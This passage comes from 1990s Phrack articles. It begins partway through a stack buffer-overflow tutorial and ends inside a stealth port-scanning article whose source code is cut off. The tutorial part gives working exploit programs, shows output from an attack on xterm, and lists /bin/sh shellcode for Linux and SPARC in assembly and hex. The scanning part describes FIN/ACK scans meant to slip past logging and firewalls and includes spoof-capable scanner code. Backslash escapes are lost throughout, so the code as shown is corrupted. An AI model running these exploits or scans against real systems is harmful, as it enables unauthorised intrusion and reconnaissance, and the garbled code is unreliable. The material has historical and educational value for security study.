  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);


  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.
");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.
");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x
", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '';
  egg[eggsize - 1] = '';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

   Lets try our new exploit with our vulnerable test program:

------------------------------------------------------------------------------
[aleph1]$ ./exploit4 768
Using address: 0xbffffdb0
[aleph1]$ ./vulnerable $RET
$
------------------------------------------------------------------------------

   Works like a charm. Now lets try it on xterm:

------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit4 2148
Using address: 0xbffffdb0
[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
Warning: Color name
"


























































































Warning: some arguments in previous message were lost
$
------------------------------------------------------------------------------

   On the first try!  It has certainly increased our odds.  Depending how 
much environment data the exploit program has compared with the program 
you are trying to exploit the guessed address may be to low or to high. 
Experiment both with positive and negative offsets.


                              Finding Buffer Overflows
                              ~~~~~~~~~~~~~~~~~~~~~~~~

   As stated earlier, buffer overflows are the result of stuffing more
information into a buffer than it is meant to hold.  Since C does not have any
built-in bounds checking, overflows often manifest themselves as writing past
the end of a character array.  The standard C library provides a number of
functions for copying or appending strings, that perform no boundary checking.
They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions 
operate on null-terminated strings, and do not check for overflow of the 
receiving string.  gets() is a function that reads a line from stdin into 
a buffer until either a terminating newline or EOF.  It performs no checks for
buffer overflows.  The scanf() family of functions can also be a problem if 
you are matching a sequence of non-white-space characters (%s), or matching a 
non-empty sequence of characters from a specified set (%[]), and the array 
pointed to by the char pointer, is not large enough to accept the whole 
sequence of characters, and you have not defined the optional maximum field 
width.  If the target of any of these functions is a buffer of static size, 
and its other argument was somehow derived from user input there is a good
posibility that you might be able to exploit a buffer overflow.

   Another usual programming construct we find is the use of a while loop to
read one character at a time into a buffer from stdin or some file until the
end of line, end of file, or some other delimiter is reached.  This type of
construct usually uses one of these functions: getc(), fgetc(), or getchar().
If there is no explicit checks for overflows in the while loop, such programs 
are easily exploited.

   To conclude, grep(1) is your friend.  The sources for free operating
systems and their utilities is readily available.  This fact becomes quite
interesting once you realize that many comercial operating systems utilities
where derived from the same sources as the free ones.  Use the source d00d.


     Appendix A - Shellcode for Different Operating Systems/Architectures
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i386/Linux
------------------------------------------------------------------------------
        jmp    0x1f
        popl   %esi
        movl   %esi,0x8(%esi)
        xorl   %eax,%eax
	movb   %eax,0x7(%esi)
        movl   %eax,0xc(%esi)
        movb   $0xb,%al
        movl   %esi,%ebx
        leal   0x8(%esi),%ecx
        leal   0xc(%esi),%edx
        int    $0x80
        xorl   %ebx,%ebx
        movl   %ebx,%eax
        inc    %eax
        int    $0x80
        call   -0x24
        .string "/bin/sh"
------------------------------------------------------------------------------

SPARC/Solaris
------------------------------------------------------------------------------
        sethi   0xbd89a, %l6
        or      %l6, 0x16e, %l6
        sethi   0xbdcda, %l7
        and     %sp, %sp, %o0
        add     %sp, 8, %o1
        xor     %o2, %o2, %o2
        add     %sp, 16, %sp
        std     %l6, [%sp - 16]
        st      %sp, [%sp - 8]
        st      %g0, [%sp - 4]
        mov     0x3b, %g1
        ta      8
        xor     %o7, %o7, %o0
        mov     1, %g1
        ta      8
------------------------------------------------------------------------------

SPARC/SunOS
------------------------------------------------------------------------------
        sethi   0xbd89a, %l6
        or      %l6, 0x16e, %l6
        sethi   0xbdcda, %l7
        and     %sp, %sp, %o0
        add     %sp, 8, %o1
        xor     %o2, %o2, %o2
        add     %sp, 16, %sp
        std     %l6, [%sp - 16]
        st      %sp, [%sp - 8]
        st      %g0, [%sp - 4]
        mov     0x3b, %g1
	mov	-0x1, %l5
        ta      %l5 + 1
        xor     %o7, %o7, %o0
        mov     1, %g1
        ta      %l5 + 1
------------------------------------------------------------------------------


                 Appendix B - Generic Buffer Overflow Program
                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shellcode.h
------------------------------------------------------------------------------
#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE	1
char nop[] = "x90";
char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE	4
char nop[]="xacx15xa1x6e";
char shellcode[] =
  "x2dx0bxd8x9axacx15xa1x6ex2fx0bxdcxdax90x0bx80x0e"
  "x92x03xa0x08x94x1ax80x0ax9cx03xa0x10xecx3bxbfxf0"
  "xdcx23xbfxf8xc0x23xbfxfcx82x10x20x3bx91xd0x20x08"
  "x90x1bxc0x0fx82x10x20x01x91xd0x20x08";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE        4
char nop[]="xacx15xa1x6e";
char shellcode[] =
  "x2dx0bxd8x9axacx15xa1x6ex2fx0bxdcxdax90x0bx80x0e"
  "x92x03xa0x08x94x1ax80x0ax9cx03xa0x10xecx3bxbfxf0"
  "xdcx23xbfxf8xc0x23xbfxfcx82x10x20x3bxaax10x3fxff"
  "x91xd5x60x01x90x1bxc0x0fx82x10x20x01x91xd5x60x01";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#endif
------------------------------------------------------------------------------

eggshell.c
------------------------------------------------------------------------------
/*
 * eggshell v1.0
 *
 * Aleph One / aleph1@underground.org
 */
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048

void usage(void);

void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
    switch (c) {
      case 'a':
        align = atoi(optarg);
        break;
      case 'b':
        bsize = atoi(optarg);
        break;
      case 'e':
        eggsize = atoi(optarg);
        break;
      case 'o':
        offset = atoi(optarg);
        break;
      case '?':
        usage();
        exit(0);
    }

  if (strlen(shellcode) > eggsize) {
    printf("Shellcode is larger the the egg.
");
    exit(0);
  }

  if (!(bof = malloc(bsize))) {
    printf("Can't allocate memory.
");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.
");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("[ Buffer size:	%d		Egg size:	%d	Aligment:	%d	]
",
    bsize, eggsize, align);
  printf("[ Address:	0x%x	Offset:		%d				]
", addr, offset);

  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      m = (n + align) % NOP_SIZE;
      *(ptr++) = nop[m];
    }

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  bof[bsize - 1] = '';
  egg[eggsize - 1] = '';

  memcpy(egg,"EGG=",4);
  putenv(egg);

  memcpy(bof,"BOF=",4);
  putenv(bof);
  system("/bin/sh");
}

void usage(void) {
  (void)fprintf(stderr,
    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]
");
}
------------------------------------------------------------------------------


--------------------------------------------------------------------------------


                              .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                    15 of 16

 
             Port Scanning without the SYN flag / Uriel Maimon
	          	(lifesux@cox.org)
            ---------------------------------------------------------


	Introduction :
	--------------

During the course of time, there has risen a demand to know the services
a certain host offers.  The field of portscanning rose to offer a solution
to this need.  At first, implementations such as SATAN, connected to each
tcp port using the full three-way-handshake (opening a full tcp connection).
The upside to this method is that the user who is scanning does not need to
custom build the ip packet he is scanning with, because he uses standard
system calls, and does not need root access (generally a uid of 0 is needed
to use SOCK_RAW, /dev/bpf,/dev/nit and so forth) the major down side to this
method is that it is easily detectable and also easily detered, using any 
number of methods, most notably the TCP Wrappers made by Wietse Venema.

The next step was of course SYN-scanning or 'half open scanning' which 
implies that a full tcp connection is never established.  The process of 
establishing a tcp connection is three phased: the originating party first
sends a TCP packet with the SYN flag on, then the target party sends a TCP 
packet with the flags SYN and ACK on if the port is open, or, if the port
is closed, the target party resets the connection with the RST flag.  The 
third phase of the negotiation is when the originating party sends a final 
TCP packet with the ACK flag on (all these packets, of course, have the 
corresponding sequence numbers, ack numbers, etc).  The connection is now
open.  A SYN-scanner only sends the first packet in the three-way-handshake, 
the SYN packet, and waits for the SYN|ACK or a RST.  When it receives one of 
the two it knows whether or not the port is listening. The major advantage to
this method is that it is not detected by normal logs such as "SATAN 
detectors" or Wiestse's tcp_wrappers.  The main disadvantages are: 

1) This method can still be detected by certian loggers that log SYN 
connection attempts ('tcplog' for example), and can still be detected by 
netstat(1).  

2) The sender, under most operating systems, needs to custom build the
entire IP packet for this kind of scanning (I don't know of any operating 
system under which this is not true, if you know of one, please let me know).
This requires access to SOCK_RAW (getprotbyname('raw'); under most systems)
or /dev/bpf (Berkeley packet filter), /dev/nit (Sun 'Network Interface Tap')
etc.  This usually requires root or privileged group access. 

3) A great deal of firewalls who would filter out this scan, will not
filter out the StealthScan(TM) (all rights reserved to vicious little red 
blow ficiouz deliciouz (kosher) chicken surpass INC PLC LTD).


 	A note about UDP portscanning:
	------------------------------

In this article I will ignore UDP portscanning for the simple reason that it 
lacks the complexity of tcp; it is not a connection oriented stream protocol
but rather a connectionless datagram protocol.  To scan a UDP port to see if 
it is listening, simply send any UDP packet to the port.  You will receive 
an ICMP 'Destination Port Unreachable' packet if the port is not listening.

To the best of my knowledge this is the only way to scan UDP ports.  I will 
be glad to be corrected -- if anyone knows of a different method please 
E-mail me. 


	The StealthScan:
	----------------

This method relies on bad net code in the BSD code.  Since most of the 
networking code in most any operating system today is BSD netcode or a 
derivative thereof it works on most systems.  (A most obvious exception to 
this is Cisco routers...  Gosh!  GOOD networking code ?!?@$! <GASP> HERESY!
Alan Cox will have a heart attack when he hears of this!)

Disadvantages of this technique:

1) The IP packet must still be custom built.  I see no solution for this
problem, unless some really insecure system calls will be put in.  I see 
no real need for this because SLIP/PPP services are so common these days,
getting super user access on a machine is not a problem any more.

2) This method relies on bugs in net code.  This can and probably will be 
fixed in the near future.  (Shhhhhh.  Don't tell Alan Cox.  He hates good  
efficient networking code.) OpenBSD, for example, has already fixed this bug. 

3) The outcome of a scan is never known, and the outcome is not similar over 
different architectures and operating systems.  It is not reliable. 

Main advantages of this method over the other methods: 

1) Very difficult to log.  Even once the method is known, devising a logging
method without fixing the actual bug itself is problematic. 

2) Can circumvent some firewalls. 

3) Will not show up on netstat(1).

4) Does not consist of any part of the standard TCP three-way-handshake.

5) Several different methods consisting of the same principle.

The actual algorithm : 

I use TCP packets with the ACK, and FIN flags turned on. I use these simply  
because they are packets that should always return RST on an unopened
connection sent to a port.  From now on I refer to such packets as 'RST' , 
'FIN', or 'ACK' packets. 

method #1:

Send a FIN packet.  If the destination host returns a RST then the port is 
closed, if there is no return RST then the port is listening.  The fact that 
this method works on so many hosts is a sad testimonial to the state of the 
networking code in most operating system kernels. 

method #2

Send an ACK packet.  If the returning packets ttl is lower than in the 
rest of the RST packets received, or if the window size is greater than 
zero, the port is probably listening.  

(Note on the ttl:  This bug is almost understandable.  Every function in IP 
is a routing function.  With every interface change, the packets ttl is 
subtracted by one.  In the case of an open port, the ttl was decremented when
it was received and examined, but when it was 'noticed' the flag was not a 
SYN, a RST was sent, with a ttl one lower then if the port had simply been 
closed.  This might not be the case.  I have not checked this theory against 
the BSD networking code.  Feel free to correct me. 

		Uriel
/*
 * scantcp.c
 * 
 * version 1.32 
 *  
 * Scans for listening TCP ports by sending packets to them and waiting for
 * replies. Relys upon the TCP specs and some TCP implementation bugs found 
 * when viewing tcpdump logs. 
 *
 * As always, portions recycled (eventually, with some stops) from n00k.c
 * (Wow, that little piece of code I wrote long ago still serves as the base
 *  interface for newer tools)
 * 
 * Technique:
 * 1. Active scanning: not supported - why bother.
 * 
 * 2. Half-open scanning:
 *      a. send SYN
 *      b. if reply is SYN|ACK send RST, port is listening
 *      c. if reply is RST, port is not listening
 * 
 * 3. Stealth scanning: (works on nearly all systems tested)
 *      a. sends FIN
 *      b. if RST is returned, not listening. 
 *      c. otherwise, port is probably listening.
 * 
 * (This bug in many TCP implementations is not limited to FIN only; in fact
 *  many other flag combinations will have similar effects. FIN alone was
 *  selected because always returns a plain RST when not listening, and the
 *  code here was fit to handle RSTs already so it took me like 2 minutes
 *  to add this scanning method)
 * 
 * 4. Stealth scanning: (may not work on all systems)
 *      a. sends ACK
 *      b. waits for RST
 *      c. if TTL is low or window is not 0, port is probably listening. 
 * 
 * (stealth scanning was created after I watched some tcpdump logs with
 *  these symptoms. The low-TTL implementation bug is currently believed
 *  to appear on Linux only, the non-zero window on ACK seems to exists on
 *  all BSDs.)
 * 
 * CHANGES:
 * --------
 * 0. (v1.0) 
 *    - First code, worked but was put aside since I didn't have time nor 
 *      need to continue developing it. 
 * 1. (v1.1)
 *    - BASE CODE MOSTLY REWRITTEN (the old code wasn't that maintainable)
 *    - Added code to actually enforce the usecond-delay without usleep()
 *      (replies might be lost if usleep()ing)
 * 2. (v1.2)
 *    - Added another stealth scanning method (FIN). 
 *      Tested and passed on:
 *      AIX 3
 *      AIX 4 
 *      IRIX 5.3 
 *      SunOS 4.1.3   
 *      System V 4.0 
 *      Linux 
 *      FreeBSD  
 *      Solaris
 *    
 *      Tested and failed on:
 *      Cisco router with services on ( IOS 11.0)
 *
 * 3. (v1.21) 
 *    - Code commented since I intend on abandoning this for a while.
 *
 * 4. (v1.3)
 *    - Resending for ports that weren't replied for.
 *      (took some modifications in the internal structures. this also
 *	 makes it possible to use non-linear port ranges 
 *	 (say 1-1024 and 6000))
 *
 * 5. (v1.31)
 *    - Flood detection - will slow up the sending rate if not replies are
 *	recieved for STCP_THRESHOLD consecutive sends. Saves alot of resends
 *	on easily-flooded networks.
 * 
 * 6. (v1.32)
 *      - Multiple port ranges support. 
 *        The format is: <start-end>|<num>[,<start-end>|<num>,...]
 *
 *        Examples: 20-26,113
 *                  20-100,113-150,6000,6660-6669
 * 		  
 * PLANNED: (when I have time for this)
 * ------------------------------------
 * (v2.x) - Multiple flag combination selections, smart algorithm to point
 *          out uncommon replies and cross-check them with another flag 
 *        
 */

#define RESOLVE_QUIET

#include <stdio.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <errno.h>

#include "resolve.c"
#include "tcppkt03.c"

#define STCP_VERSION "1.32"
#define STCP_PORT  1234		       /* Our local port. */
#define STCP_SENDS 3            
#define STCP_THRESHOLD 8
#define STCP_SLOWFACTOR 10

/* GENERAL ROUTINES ------------------------------------------- */

void banner(void)
     {
	printf("
scantcp
");
	printf("version %s
",STCP_VERSION);
     }
	
void usage(const char *progname)
     {
	printf("
usage: 
");
	printf("%s <method> <source> <dest> <ports> <udelay> <delay> [sf]

",progname);
        printf("	<method> : 0: half-open scanning (type 0, SYN)
");
	printf("	           1: stealth scanning (type 1, FIN)
");
	printf("	           2: stealth scanning (type 2, ACK)
");
	printf("	<source> : source address (this host)
");
	printf("	<dest>   : target to scan
");
	printf("	<ports>  : ports/and or ranges to scan - eg: 21-30,113,6000
");
	printf("	<udelay> : microseconds to wait between TCP sends
");
	printf("	<delay>  : seconds to wait for TCP replies
");
	printf("	[sf]     : slow-factor in case sends are dectected to be too fast

");
     }

/* OPTION PARSING etc ---------------------------------------- */

unsigned char *dest_name;
unsigned char *spoof_name;
struct sockaddr_in destaddr;

unsigned long dest_addr;
unsigned long spoof_addr;
unsigned long usecdelay;
unsigned      waitdelay;

int slowfactor = STCP_SLOWFACTOR;

struct portrec 			       /* the port-data structure */
{
   unsigned           n;
   int                state;
   unsigned char      ttl;
   unsigned short int window;
   unsigned long int  seq;
   char               sends;

} *ports;

char *portstr;

unsigned char scanflags;

int done;

int rawsock;			       /* socket descriptors */
int tcpsock;

int lastidx = 0;		       /* last sent index */
int maxports;                          /* total number of ports */

void timeout(int signum)	       /* timeout handler           */
     {				       /* this is actually the data */
	int someopen = 0;	       /* analyzer function. werd.  */
	unsigned lastsent;
	int checklowttl = 0;
	
	struct portrec *p;
	
	printf("* SCANNING IS OVER

");
	fflush(stdout);
	
	done = 1;

	
	for (lastsent = 0;lastsent<maxports;lastsent++)
	  {
	     p = ports+lastsent;
	     if (p->state == -1) 
	       if (p->ttl > 64)
	       {
		  checklowttl = 1;
		  break;
	       }
	  }
				       
/* the above loop checks whether there's need to report low-ttl packets */
	
	for (lastsent = 0;lastsent<maxports;lastsent++)
	  {	
	     p = ports+lastsent;
	     
	     destaddr.sin_port = htons(p->n);
	     
	     tcpip_send(rawsock,&destaddr,
			spoof_addr,destaddr.sin_addr.s_addr,
			STCP_PORT,ntohs(destaddr.sin_port),
			TH_RST,
			p->seq++, 0,
			512,
			NULL,
			0);
	  }			       /* just RST -everything- sent   */
				       /* this inclued packets a reply */
				       /* (even RST) was recieved for  */
	
	
	
	
	for (lastsent = 0;lastsent<maxports;lastsent++)
	  {			       /* here is the data analyzer */
	     p = ports+lastsent;
	     switch (scanflags)
	       {
		case TH_SYN:
		  switch(p->state)
		    {
		     case -1: break;  
		     case 1 : printf("# port %d is listening.
",p->n);
		       someopen++;
		       break;
		     case 2 : printf("# port %d maybe listening (unknown response).
",
				     p->n);
		       someopen++;
		       break;
		     default: printf("# port %d needs to be rescanned.
",p->n);
		    }
		  break;
		case TH_ACK:
		  switch (p->state)
		    {
		     case -1:
		       if (((p->ttl < 65) && checklowttl) || (p->window >0))
			 {
			    printf("# port %d maybe listening",p->n);
			    if (p->ttl < 65) printf(" (low ttl)");
			    if (p->window >0) printf(" (big window)");
			    printf(".
");
			    someopen++;
			 }
		       break;
		     case 1:
		     case 2:  
		       printf("# port %d has an unexpected response.
",
			      p->n);
		       break;
		     default: 
		       printf("# port %d needs to be rescanned.
",p->n);
		    }
		  break;
		case TH_FIN:
		  switch (p->state)
		    {
		     case -1:
		       break;
		     case 0 :
		       printf("# port %d maybe open.
",p->n);
		       someopen++;
		       break;
		     default:
		       printf("# port %d has an unexpected response.
",p->n);
		    }
	       }
	  }
	
	printf("-----------------------------------------------
");
	printf("# total ports open or maybe open: %d

",someopen);
	free(ports);
	
	exit(0);		       /* heh. */
     
     }


int resolve_one(const char *name, unsigned long *addr, const char *desc)
     {
        struct sockaddr_in tempaddr;
	if (resolve(name, &tempaddr,0) == -1) {
	   printf("error: can't resolve the %s.
",desc);
	   return -1;
	}
            
	*addr = tempaddr.sin_addr.s_addr;
       	return 0;
     }

void give_info(void)
     {
	printf("# response address           : %s (%s)
",spoof_name,inet_ntoa(spoof_addr));
	printf("# target address             : %s (%s)
",dest_name,inet_ntoa(dest_addr));
	printf("# ports                      : %s
",portstr);
	printf("# (total number of ports)    : %d
",maxports);
	printf("# delay between sends        : %lu microseconds
",usecdelay);
	printf("# delay                      : %u seconds
",waitdelay);
        printf("# flood dectection threshold : %d unanswered sends
",STCP_THRESHOLD);
	printf("# slow factor                : %d
",slowfactor);
        printf("# max sends per port         : %d

",STCP_SENDS);
     }


int parse_args(int argc, char *argv[]) 
{
       	
   if (strrchr(argv[0],'/') != NULL) 
     argv[0] = strrchr(argv[0],'/') + 1;
   
   if (argc < 7)  {
      printf("%s: not enough arguments
",argv[0]);
      return -1;
   }
   
   switch (atoi(argv[1]))
     {
      case 0  : scanflags = TH_SYN; 
	        break;
      case 1  : scanflags = TH_FIN; 
	        break;
      case 2  : scanflags = TH_ACK;
	        break;
      default : printf("%s: unknown scanning method
",argv[0]);
	        return -1;
     }
		 
   spoof_name = argv[2];
   dest_name = argv[3];    
   
   portstr = argv[4];
   
   usecdelay = atol(argv[5]);
   waitdelay = atoi(argv[6]);

   if (argc > 7) slowfactor = atoi(argv[7]);
   
   if ((usecdelay == 0) && (slowfactor > 0))
     {
	printf("%s: adjusting microsecond-delay to 1usec.
");
	usecdelay++;
     }
   return 0; 		      	
}

/* MAIN ------------------------------------------------------ */

int build_ports(char *str)       /* build the initial port-database */
{
   int i;
   int n;
   struct portrec *p;
   int sport;
   
   char *s;
   
   
   s        = str;
   maxports = 0;
   n        = 0;
   
   while (*s != '')
     {
	switch (*s)
	  {
	   case '0':
	   case '1':
	   case '2':
	   case '3':
	   case '4':
	   case '5':
	   case '6':
	   case '7':
	   case '8':
	   case '9':
	     n *= 10;
	     n += (*s - '0');
	     break;
	   case '-': 
	     if (n == 0) return -1;
	     sport = n;
	     n = 0;
	     break;
	   case ',': 
	     if (n == 0) return -1;
	     if (sport != 0)
	       {
		  if (sport >= n) return -1;
		  maxports += n-sport;
		  sport = 0;
	       } else
	       maxports++;
	     n = 0;
	     break;
	  }
	s++;
     }
   if (n == 0) return -1;
   if (sport != 0)
     {
	if (sport >= n) return -1;
	maxports += n-sport;
	sport = 0;
     }
   else
     maxports++;
   
   maxports+=2;
   
   if ((ports = (struct portrec *)malloc((maxports)*sizeof(struct portrec))) == NULL)
     {
	fprintf(stderr,"
error: not enough memory for port database

");
	exit(1);
     }

   s        = str;
   maxports = 0;
   n        = 0;
   
   while (*s != '')
     {
	switch (*s)
	  {
	   case '0':
	   case '1':
	   case '2':
	   case '3':
	   case '4':
	   case '5':
	   case '6':
	   case '7':
	   case '8':
	   case '9':
	     n *= 10;
	     n += (*s - '0');
	     break;
	   case '-': 
	     if (n == 0) return -1;
	     sport = n;
	     n = 0;
	     break;
	   case ',': 
	     if (n == 0) return -1;
	     if (sport != 0)
	       {
		  if (sport >= n) return -1;
		  while (sport <= n)
		    {
		       for (i=0;i<maxports;i++)
			 if ((ports+i)->n == sport) break;
		       
		       if (i < maxports-1 ) 
			 printf("notice: duplicate port - %d
",sport);
		       else   
			 {
			    (ports+maxports)->n = sport;
			    maxports++;
			 }
		       sport++;
		    }
		  sport = 0;
	       } else
	       {
		  for (i=0;i<maxports;i++)
		    if ((ports+i)->n == n) break;
		       
		  if (i < maxports-1 ) 
		    printf("notice: duplicate port - %d
",n);
		  else     
		    {
		       (ports+maxports)->n = n;
		       maxports++;
		    }
	       }
	     n = 0;
	     break;
	  }
	s++;
     }


   if (n == 0) return -1;
   if (sport != 0)
     {
	if (sport >= n) return -1;
	while (sport <= n)
	  {
	     for (i=0;i<maxports;i++)
	       if ((ports+i)->n == sport) break;
	     
	     if (i < maxports-1 ) 
	       printf("notice: duplicate port - %d
",sport);
	     else   
	       {
		  (ports+maxports)->n = sport;
		  maxports++;
	       }
	     sport++;
	  }
	sport = 0;
     } else
     {
	for (i=0;i<maxports;i++)
	  if ((ports+i)->n == n) break;
	
	if (i < maxports-1 ) 
	  printf("notice: duplicate port - %d
",n);
	else     
	  {
	     (ports+maxports)->n = n;
	     maxports++;
	  }
     }
   
   printf("
");
   
   for (i=0;i<maxports;i++)
     {
	p        = ports+i;
	p->state = 0;
	p->sends = 0;
     }
  
   return 0;
   
}
   
struct portrec *portbynum(int num)
{
   int i = 0;
   
   while ( ((ports+i)->n != num) && (i<maxports) ) i++;
   
   if ( i == maxports ) return NULL;

   return (ports+i);
}

struct portrec *nextport(char save)
{
   struct portrec *p = ports;
   int doneports     = 0;
   
   int oldlastidx = lastidx;
      
   while (doneports != maxports)
     {
	p = ports+lastidx;
        
	if ((p->state != 0) || (p->sends == STCP_SENDS))
	  {
	     doneports++; 
	     lastidx++;
	     lastidx %= maxports;
	  }
	else
	  break;
     }
 
   if (save) 
     lastidx = oldlastidx;
   else
     lastidx = (lastidx + 1) % maxports;
   
   if (doneports == maxports) return NULL;
   
   return p;
}
   
   
   

inline unsigned long usecdiff(struct timeval *a, struct timeval *b)
{
   unsigned long s;
   
   s = b->tv_sec - a->tv_sec;
   s *= 1000000;
   s += b->tv_usec - a->tv_usec;
   
   return s;			       /* return the stupid microsecond diff */
}

void main(int argc, char *argv[])      
{
   int lastsent = 0;
   
   char buf[3000];
   
   struct iphdr  *ip   = (struct iphdr *)(buf);
   struct tcphdr *tcp  = (struct tcphdr *)(buf+sizeof(struct iphdr));

   struct sockaddr_in from;
   int fromlen;
  
   struct portrec *readport;
   
   fd_set rset, wset;

   struct timeval waitsend, now, del;

   unsigned long udiff;
   
   int sendthreshold = 0;
   
   
   banner();
   
   if (parse_args(argc,argv)) 
     {  
	usage(argv[0]); 
	return;
     }
   
   if (resolve_one(dest_name, 
		    &dest_addr,
		    "destination host")) exit(1);
   
   destaddr.sin_addr.s_addr = dest_addr;
   destaddr.sin_family = AF_INET;

   if (resolve_one(spoof_name,
		    &spoof_addr,
		    "source host")) exit(1);
   
   if ( build_ports(portstr) == -1) 
     {
	printf("
%s: bad port string
",argv[0]);
	usage(argv[0]);
	return;
     }
   
   give_info();
   
   if ((tcpsock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
     {
	printf("
error: couldn't get TCP raw socket

");
	exit(1);
     }
   if ((rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
     {
	printf("
error: couldn't get raw socket

");
	exit(1);
     }
   
   /* well, let's get to it. */
   
   done = 0;
   
   printf("* BEGINNING SCAN
");
   fflush(stdout);

   gettimeofday(&waitsend,NULL);
   
   while (!done)
     {

	if (nextport(1) == NULL) 
	  {
	     alarm(0);	           /* no more sends, now we just  */
	     signal(SIGALRM,timeout); /* to wait <waitdelay> seconds */
	     alarm(waitdelay);        /* before resetting and giving */
	  }                           /* results.                    */

	FD_ZERO(&rset);
	
	FD_SET(tcpsock,&rset);
	
	gettimeofday(&now,NULL);
	
        udiff = usecdiff(&waitsend,&now);
		
	/* here comes the multiple choice select().
	 * well, there are 3 states: 
	 * 1. already sent all the packets.
	 * 2. didn't send all the packets, but it's not time for another send
	 * 3. didn't send all the packets and it is time for another send.
	 */
	 
      	if (nextport(1) != NULL)
	  if (udiff > usecdelay)
	  {
	     FD_ZERO(&wset);
	     FD_SET(rawsock,&wset);
	     select(FD_SETSIZE,&rset,&wset,NULL,NULL);
	  } else
	  {
	     del.tv_sec = 0;
	     del.tv_usec = usecdelay;
	     select(FD_SETSIZE,&rset,NULL,NULL,&del);
	  }
	else
	  select(FD_SETSIZE,&rset,NULL,NULL,NULL);
	
	if (FD_ISSET(tcpsock,&rset))   /* process the reply */
	  {
	     fromlen = sizeof(from);
	     
	     recvfrom(tcpsock,&buf,3000,0,
		      (struct sockaddr *)&from,&fromlen);
	     
	     if (from.sin_addr.s_addr == destaddr.sin_addr.s_addr)
	       if (ntohs(tcp->th_dport) == STCP_PORT)
	       {
		  printf("* got reply");
		  
		  readport = portbynum(ntohs(tcp->th_sport));
		  
		  if (readport == NULL) 
		    printf(" -- bad port");
		  else
		    {
		       sendthreshold = 0;
		       if (!readport->state)  
			 {
			    readport->ttl    = ip->ttl;
			    readport->window = tcp->th_win;
			    
			    if (tcp->th_flags & TH_RST)
			      {
				 readport->state = -1;
				 printf(" (RST)");
				 if (readport->ttl    < 65) printf(" (short ttl)");
				 if (readport->window > 0) printf(" (big window)");
			      }
			    else
			      if (tcp->th_flags & (TH_ACK | TH_SYN))
			      {
				 readport->state = 1;
				 printf(" (SYN+ACK)");
				 tcpip_send(rawsock,&destaddr,
					    spoof_addr,destaddr.sin_addr.s_addr,
					    STCP_PORT,readport->n,
					    TH_RST,
					    readport->seq++, 0,
					    512,
					    NULL,
					    0);
			      }
			    else
			      {
				 readport->state = 2;
				 printf(" (UNEXPECTED)");
				 tcpip_send(rawsock,&destaddr,
					    spoof_addr,destaddr.sin_addr.s_addr,
					    STCP_PORT,readport->n,
					    TH_RST,
					    readport->seq++, 0,
					    512,
					    NULL,
					    0);
			      }
			 }
		       else
			 printf(" (duplicate)");
		    }
		  printf("
");
		  fflush(stdout);
	       }
	  }
	
	if (nextport(1) != NULL)
	  if (FD_ISSET(rawsock,&wset)) /* process the sends */
	  {
	     readport = nextport(0);
	     
	     destaddr.sin_port = htons(readport->n);

	     printf("* sending to port %d ",ntohs(destaddr.sin_port));

	     readport->seq = lrand48();
	     readport->sends++;
	     
	     tcpip_send(rawsock,&destaddr,
			spoof_addr,destaddr.sin_addr.s_addr,
			STCP_PORT,ntohs(destaddr.sin_port),
			scanflags,
			readport->seq++, lrand48(),
			512,
			NULL,
			0);
	     
